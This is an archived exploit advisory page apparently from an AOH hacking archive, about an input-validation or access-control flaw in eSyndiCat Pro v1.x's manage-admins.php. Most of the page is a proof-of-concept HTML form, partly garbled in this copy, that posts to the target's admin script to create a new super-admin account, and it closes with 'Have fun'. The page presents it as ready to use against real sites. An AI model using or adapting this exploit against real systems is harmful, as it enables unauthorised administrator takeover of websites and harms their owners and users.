AOH :: HP Unsorted E :: TB10957.HTM

eSyndiCat Input Validation Error Vulnerability



eSyndiCat Input Validation Error Vulnerability
eSyndiCat Input Validation Error Vulnerability



eSyndiCat is Directory websystem, a product of eSyndiCat.com
It has security hole allow attackers get admin and more and more.
Infected version: eSyndiCat Pro v1.x
Infected file: manage-admins.php
Use poc file to attack:

------------------------------------------------

Discovered by H2P - A member of http://vnbrain.net

action="http://target/path/admin/manage-admins.php?action=add" method="post"> =09 =09
Admin username:
Admin Fullname:
Admin Email: value="hack2prison@freeprotect.net" />
Admin password:
Admin Password Confirmation:
Admin Status:
Submission Notification:
Payment Notification:
Admin Permissions
Super Admin:
------------------------------------------------ Have fun

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.